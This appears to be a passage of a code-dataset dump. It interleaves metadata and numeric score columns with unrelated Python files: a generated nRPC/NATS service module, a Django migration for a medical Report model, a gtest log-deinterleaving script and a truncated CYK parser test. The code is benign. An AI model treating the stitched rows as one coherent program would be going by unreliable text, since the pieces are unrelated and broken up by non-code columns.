7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 0, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 0, (4, 7): 0, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 1, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 1, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 0, (6, 2): 1, (6, 3): 0, (6, 4): 1, (6, 5): 1, (6, 6): 0, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}]
| 5,654
| 5,654
| 0.27255
| 1,537
| 5,654
| 1.002602
| 0.005856
| 0.125892
| 0.044776
| 0.038936
| 0.988319
| 0.979234
| 0.979234
| 0.979234
| 0.968851
| 0.968851
| 0
| 0.372906
| 0.271489
| 5,654
| 1
| 5,654
| 5,654
| 0.001214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
02027c5d8ec756df9934f57dbc6757bab9198864
| 14,669
|
py
|
Python
|
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | 6
|
2019-02-28T22:45:01.000Z
|
2021-02-04T16:09:52.000Z
|
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | null | null | null |
examples/alloptions/alloptions_nrpc.py
|
nats-rpc/python-nrpc
|
1c8699f4c544ca988ce2f7afbe35033afd47f045
|
[
"MIT"
] | 1
|
2019-06-30T13:36:46.000Z
|
2019-06-30T13:36:46.000Z
|
# This file is automatically generated from alloptions.proto, DO NOT EDIT!
import asyncio
import nats.aio
import nrpc
import nrpc.exc
from nrpc import nrpc_pb2
import nrpc.nrpc_pb2 as nrpc_dot_nrpc__pb2
import alloptions_pb2 as alloptions__pb2
PKG_SUBJECT = "root"
PKG_SUBJECT_PARAMS = ["instance"]
PKG_SUBJECT_PARAMS_COUNT = 1
SvcCustomSubject_SUBJECT = "custom_subject"
SvcCustomSubject_SUBJECT_PARAMS = []
SvcCustomSubject_SUBJECT_PARAMS_COUNT = 0
class SvcCustomSubjectHandler:
methods = {
"mt_simple_reply": (
"MtSimpleReply",
0,
alloptions__pb2.StringArg,
True,
False,
False,
),
"mtvoidreply": ("MtVoidReply", 0, alloptions__pb2.StringArg, True, True, False),
"mtnorequest": (
"MtNoRequest",
0,
nrpc_dot_nrpc__pb2.NoRequest,
True,
False,
False,
),
"mtstreamedreply": (
"MtStreamedReply",
0,
alloptions__pb2.StringArg,
True,
False,
True,
),
"mtvoidreqstreamedreply": (
"MtVoidReqStreamedReply",
0,
None,
True,
False,
True,
),
}
def __init__(self, nc, server):
self.nc = nc
self.server = server
def subject(self, pkg_instance="*", method=">"):
return ".".join(["root", pkg_instance, SvcCustomSubject_SUBJECT, method])
async def handler(self, msg):
try:
pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
PKG_SUBJECT,
PKG_SUBJECT_PARAMS_COUNT,
SvcCustomSubject_SUBJECT,
SvcCustomSubject_SUBJECT_PARAMS_COUNT,
msg.subject,
)
(
mname,
params_count,
input_type,
has_reply,
void_reply,
streamed_reply,
) = self.methods[mt_subject]
mt_params, count = nrpc.parse_subject_tail(params_count, tail)
method = getattr(self.server, mname)
if input_type is not None:
req = input_type.FromString(msg.data)
mt_params.append(req)
err = None
if streamed_reply:
await nrpc.streamed_reply_handler(
self.nc, msg.reply, method(*mt_params)
)
return
try:
rep = await method(*mt_params)
except nrpc.exc.NrpcError as e:
err = e.as_nrpc_error()
except Exception as e:
err = nrpc.exc.server_error(e)
else:
if isinstance(rep, nrpc.ClientError):
err = rep
elif void_reply and rep is not None:
raise ValueError(
"Method %s implementation should return None" % mname
)
if has_reply:
if err is not None:
rawRep = b"\x00" + err.SerializeToString()
elif rep is not None:
rawRep = rep.SerializeToString()
else:
rawRep = b""
await self.nc.publish(msg.reply, rawRep)
except Exception as e:
import traceback
traceback.print_exc()
print("Error in SvcCustomSubject.%s handler:" % mname, e)
class SvcCustomSubjectClient:
def __init__(
self,
nc,
pkg_instance,
):
self.nc = nc
self.pkg_instance = pkg_instance
async def MtSimpleReply(
self,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcCustomSubject_SUBJECT
+ "."
+ "mt_simple_reply"
)
rawReq = req.SerializeToString()
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
return alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
async def MtVoidReply(
self,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcCustomSubject_SUBJECT
+ "."
+ "mtvoidreply"
)
rawReq = req.SerializeToString()
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
if len(rawRep.data):
raise ValueError("Received a non-empty response")
return None
async def MtNoRequest(
self,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcCustomSubject_SUBJECT
+ "."
+ "mtnorequest"
)
rawReq = req.SerializeToString()
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
return alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
async def MtStreamedReply(
self,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcCustomSubject_SUBJECT
+ "."
+ "mtstreamedreply"
)
rawReq = req.SerializeToString()
async for rawRep in nrpc.streamed_reply_request(self.nc, subject, rawReq, 5):
yield alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
async def MtVoidReqStreamedReply(
self,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcCustomSubject_SUBJECT
+ "."
+ "mtvoidreqstreamedreply"
)
rawReq = b""
async for rawRep in nrpc.streamed_reply_request(self.nc, subject, rawReq, 5):
yield alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
SvcSubjectParams_SUBJECT = "svcsubjectparams"
SvcSubjectParams_SUBJECT_PARAMS = ["clientid"]
SvcSubjectParams_SUBJECT_PARAMS_COUNT = 1
class SvcSubjectParamsHandler:
methods = {
"mtwithsubjectparams": ("MtWithSubjectParams", 2, None, True, False, False),
"mtnoreply": ("MtNoReply", 0, None, False, False, False),
"mtnorequestwparams": (
"MtNoRequestWParams",
1,
nrpc_dot_nrpc__pb2.NoRequest,
True,
False,
False,
),
}
def __init__(self, nc, server):
self.nc = nc
self.server = server
def subject(self, pkg_instance="*", svc_clientid="*", method=">"):
return ".".join(
["root", pkg_instance, SvcSubjectParams_SUBJECT, svc_clientid, method]
)
async def handler(self, msg):
try:
pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
PKG_SUBJECT,
PKG_SUBJECT_PARAMS_COUNT,
SvcSubjectParams_SUBJECT,
SvcSubjectParams_SUBJECT_PARAMS_COUNT,
msg.subject,
)
(
mname,
params_count,
input_type,
has_reply,
void_reply,
streamed_reply,
) = self.methods[mt_subject]
mt_params, count = nrpc.parse_subject_tail(params_count, tail)
method = getattr(self.server, mname)
if input_type is not None:
req = input_type.FromString(msg.data)
mt_params.append(req)
err = None
if streamed_reply:
await nrpc.streamed_reply_handler(
self.nc, msg.reply, method(*mt_params)
)
return
try:
rep = await method(*mt_params)
except nrpc.exc.NrpcError as e:
err = e.as_nrpc_error()
except Exception as e:
err = nrpc.exc.server_error(e)
else:
if isinstance(rep, nrpc.ClientError):
err = rep
elif void_reply and rep is not None:
raise ValueError(
"Method %s implementation should return None" % mname
)
if has_reply:
if err is not None:
rawRep = b"\x00" + err.SerializeToString()
elif rep is not None:
rawRep = rep.SerializeToString()
else:
rawRep = b""
await self.nc.publish(msg.reply, rawRep)
except Exception as e:
import traceback
traceback.print_exc()
print("Error in SvcSubjectParams.%s handler:" % mname, e)
class SvcSubjectParamsClient:
def __init__(
self,
nc,
pkg_instance,
svc_clientid,
):
self.nc = nc
self.pkg_instance = pkg_instance
self.svc_clientid = svc_clientid
async def MtWithSubjectParams(
self,
mp1,
mp2,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcSubjectParams_SUBJECT
+ "."
+ self.svc_clientid
+ "."
+ "mtwithsubjectparams"
+ "."
+ mp1
+ "."
+ mp2
)
rawReq = b""
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
return alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
async def MtNoReply(
self,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcSubjectParams_SUBJECT
+ "."
+ self.svc_clientid
+ "."
+ "mtnoreply"
)
rawReq = b""
await self.nc.publish(subject, rawReq)
async def MtNoRequestWParams(
self,
mp1,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ SvcSubjectParams_SUBJECT
+ "."
+ self.svc_clientid
+ "."
+ "mtnorequestwparams"
+ "."
+ mp1
)
rawReq = req.SerializeToString()
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
return alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
NoRequestService_SUBJECT = "norequestservice"
NoRequestService_SUBJECT_PARAMS = []
NoRequestService_SUBJECT_PARAMS_COUNT = 0
class NoRequestServiceHandler:
methods = {
"mtnorequest": (
"MtNoRequest",
0,
nrpc_dot_nrpc__pb2.NoRequest,
True,
False,
False,
),
}
def __init__(self, nc, server):
self.nc = nc
self.server = server
def subject(self, pkg_instance="*", method=">"):
return ".".join(["root", pkg_instance, NoRequestService_SUBJECT, method])
async def handler(self, msg):
try:
pkg_params, svc_params, mt_subject, tail = nrpc.parse_subject(
PKG_SUBJECT,
PKG_SUBJECT_PARAMS_COUNT,
NoRequestService_SUBJECT,
NoRequestService_SUBJECT_PARAMS_COUNT,
msg.subject,
)
(
mname,
params_count,
input_type,
has_reply,
void_reply,
streamed_reply,
) = self.methods[mt_subject]
mt_params, count = nrpc.parse_subject_tail(params_count, tail)
method = getattr(self.server, mname)
if input_type is not None:
req = input_type.FromString(msg.data)
mt_params.append(req)
err = None
if streamed_reply:
await nrpc.streamed_reply_handler(
self.nc, msg.reply, method(*mt_params)
)
return
try:
rep = await method(*mt_params)
except nrpc.exc.NrpcError as e:
err = e.as_nrpc_error()
except Exception as e:
err = nrpc.exc.server_error(e)
else:
if isinstance(rep, nrpc.ClientError):
err = rep
elif void_reply and rep is not None:
raise ValueError(
"Method %s implementation should return None" % mname
)
if has_reply:
if err is not None:
rawRep = b"\x00" + err.SerializeToString()
elif rep is not None:
rawRep = rep.SerializeToString()
else:
rawRep = b""
await self.nc.publish(msg.reply, rawRep)
except Exception as e:
import traceback
traceback.print_exc()
print("Error in NoRequestService.%s handler:" % mname, e)
class NoRequestServiceClient:
def __init__(
self,
nc,
pkg_instance,
):
self.nc = nc
self.pkg_instance = pkg_instance
async def MtNoRequest(
self,
req,
):
subject = (
PKG_SUBJECT
+ "."
+ self.pkg_instance
+ "."
+ NoRequestService_SUBJECT
+ "."
+ "mtnorequest"
)
rawReq = req.SerializeToString()
rawRep = await self.nc.timed_request(subject, rawReq, 5)
if rawRep.data and rawRep.data[0] == 0:
raise nrpc.exc.from_error(nrpc_pb2.Error.FromString(rawRep.data[1:]))
return alloptions__pb2.SimpleStringReply.FromString(rawRep.data)
| 28.706458
| 88
| 0.508351
| 1,328
| 14,669
| 5.406627
| 0.09488
| 0.022563
| 0.031337
| 0.036769
| 0.768942
| 0.747911
| 0.731337
| 0.729805
| 0.716295
| 0.716295
| 0
| 0.00862
| 0.406844
| 14,669
| 510
| 89
| 28.762745
| 0.816573
| 0.004908
| 0
| 0.777778
| 1
| 0
| 0.054334
| 0.004522
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.022222
| 0.006667
| 0.088889
| 0.013333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
021e2cd1713565db577a0e08a48da7e216db290d
| 33
|
py
|
Python
|
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | 9
|
2021-06-08T13:29:26.000Z
|
2022-03-29T17:29:46.000Z
|
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | null | null | null |
inference/models/__init__.py
|
JRC1995/Continuous-RvNN
|
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
|
[
"MIT"
] | null | null | null |
from .NLI_model import NLI_model
| 16.5
| 32
| 0.848485
| 6
| 33
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0281f8b1922a449405da5398bf0841f4ebc00f92
| 8,650
|
py
|
Python
|
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
app/migrations/0008_auto_20200516_1705.py
|
abhijmics/Mediclear-Admin
|
d6f84d5aa94303b19e115e6d993caadda4df2ecf
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.5 on 2020-05-16 11:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0007_auto_20200516_1700'),
]
operations = [
migrations.AlterField(
model_name='report',
name='address',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='albumin',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='backmovements',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='blood_group',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='chestlung',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='comment',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='curvicalspine',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='diastolic',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='dob',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='email',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='gender',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='hb',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='hdl',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='hearing',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='heartsound',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='height',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='jointmovements',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='ldl',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='name',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='peripheralpulse',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='plateletscount',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='pulserate',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q1',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q10',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q11',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q2',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q3',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q4',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q5',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q6',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q7',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q8',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='q9',
field=models.CharField(blank=True, choices=[('Yes', 'Yes'), ('No', 'No')], max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='rbc',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='reflexes',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='result',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='rh_factor',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='rombergs',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='sugar',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='systolic',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='tlc',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='triglycerides',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='upperlimbs',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='vision',
field=models.CharField(blank=True, max_length=120, null=True),
),
migrations.AlterField(
model_name='report',
name='weight',
field=models.CharField(blank=True, max_length=120, null=True),
),
]
| 36.192469
| 114
| 0.540116
| 851
| 8,650
| 5.378378
| 0.102233
| 0.196635
| 0.245794
| 0.285121
| 0.906052
| 0.906052
| 0.897531
| 0.897531
| 0.897531
| 0.897531
| 0
| 0.030354
| 0.318266
| 8,650
| 238
| 115
| 36.344538
| 0.745803
| 0.005202
| 0
| 0.775862
| 1
| 0
| 0.080437
| 0.002673
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00431
| 0
| 0.017241
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5a22be3bc32a63884832f9ab0f75b0c6ebee87f3
| 3,230
|
py
|
Python
|
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
tools/deinterleave.py
|
ctring/Detock
|
a1171a511d9cd1f79cc3a8d54ec17f759d088de4
|
[
"MIT"
] | null | null | null |
"""Group output of gtest by thread id
Example usage:
> python3 tools/deinterleave.py <<EOF
I1226 06:33:06.426666 11224 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e0
I1226 06:33:06.427703 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447345 11232 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e1
I1226 06:33:06.447707 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447993 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.448770 11232 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.448783 11232 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.449044 11232 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449077 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.449609 11224 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.449635 11224 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449654 11224 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.450145 11232 broker.cpp:181] All READY messages received
I1226 06:33:06.450448 11224 broker.cpp:181] All READY messages received
EOF
========================================================================================================
Thread "11224"
I1226 06:33:06.426666 11224 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e0
I1226 06:33:06.427703 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.449077 11224 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.449609 11224 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.449635 11224 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.449654 11224 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.450448 11224 broker.cpp:181] All READY messages received
Thread "11232"
I1226 06:33:06.447345 11232 broker.cpp:113] Bound Broker to: ipc:///tmp/test_e2e1
I1226 06:33:06.447707 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e0
I1226 06:33:06.447993 11232 broker.cpp:133] Sent READY message to ipc:///tmp/test_e2e1
I1226 06:33:06.448770 11232 broker.cpp:146] Waiting for READY messages from other machines...
I1226 06:33:06.448783 11232 broker.cpp:172] Received READY message from /tmp/test_e2e1 (rep: 0, part: 1)
I1226 06:33:06.449044 11232 broker.cpp:172] Received READY message from /tmp/test_e2e0 (rep: 0, part: 0)
I1226 06:33:06.450145 11232 broker.cpp:181] All READY messages received
"""
import re
import sys
logs_per_thread = {}
max_len = 10
for line in sys.stdin:
log = line.strip()
max_len = max(max_len, len(log))
tokens = re.split("\s+", log)
if len(tokens) > 3:
thread_id = tokens[2]
logs_per_thread.setdefault(thread_id, []).append(log)
print()
print("=" * max_len)
for thread_id in logs_per_thread:
print(f'Thread "{thread_id}"')
for log in logs_per_thread[thread_id]:
print(log)
print()
| 52.95082
| 104
| 0.721672
| 568
| 3,230
| 4.038732
| 0.149648
| 0.08544
| 0.109852
| 0.134263
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0.83871
| 0
| 0.263849
| 0.128173
| 3,230
| 60
| 105
| 53.833333
| 0.550781
| 0.854489
| 0
| 0.111111
| 0
| 0
| 0.051836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.277778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0cb68a654e6d1e85ef73978d2a9c69ad6442c61c
| 3,998
|
py
|
Python
|
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | null | null | null |
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | 2
|
2020-09-08T12:09:47.000Z
|
2020-10-14T12:18:14.000Z
|
src/tests/cyk_test.py
|
Rimalon/formal-language-tasks
|
16f110dbb658e714261958544c3d748ad5a14a12
|
[
"MIT"
] | null | null | null |
import unittest
from pyformlang.cfg import Terminal, Variable
from src.classes import CNF
from src.main.CYK import cyk
aSbS = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/grammar_aSbS_or_epsilon.txt'
aNbN = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/grammar_a^nb^n.txt'
task_1_grammar = '/home/travis/build/Rimalon/formal-language-tasks/src/tests/resources/task_4_3_1_grammar_example.txt'
a = Terminal('a')
b = Terminal('b')
mult = Terminal('*')
plus = Terminal('+')
n = Terminal('n')
open = Terminal('(')
close = Terminal(')')
class CykTestCase(unittest.TestCase):
def test_aSbS_cyk(self):
grammar = CNF.from_file(aSbS)
self.assertTrue(cyk([], grammar))
self.assertTrue(cyk([a, b], grammar))
self.assertTrue(cyk([a, a, b, b], grammar))
self.assertTrue(cyk([a, a, a, b, b, b], grammar))
self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
self.assertTrue(cyk([a, b, a, b], grammar))
self.assertFalse(cyk([a, b, a], grammar))
self.assertFalse(cyk([a, a, a, a, b], grammar))
self.assertFalse(cyk([a, b, b, b, b], grammar))
self.assertFalse(cyk([a, a, a, a, a], grammar))
self.assertFalse(cyk([b, b, b, b, b], grammar))
def test_aSbS_cyk_reduced(self):
grammar = CNF.from_file(aSbS, is_reduced=True)
self.assertTrue(cyk([], grammar))
self.assertTrue(cyk([a, b], grammar))
self.assertTrue(cyk([a, a, b, b], grammar))
self.assertTrue(cyk([a, a, a, b, b, b], grammar))
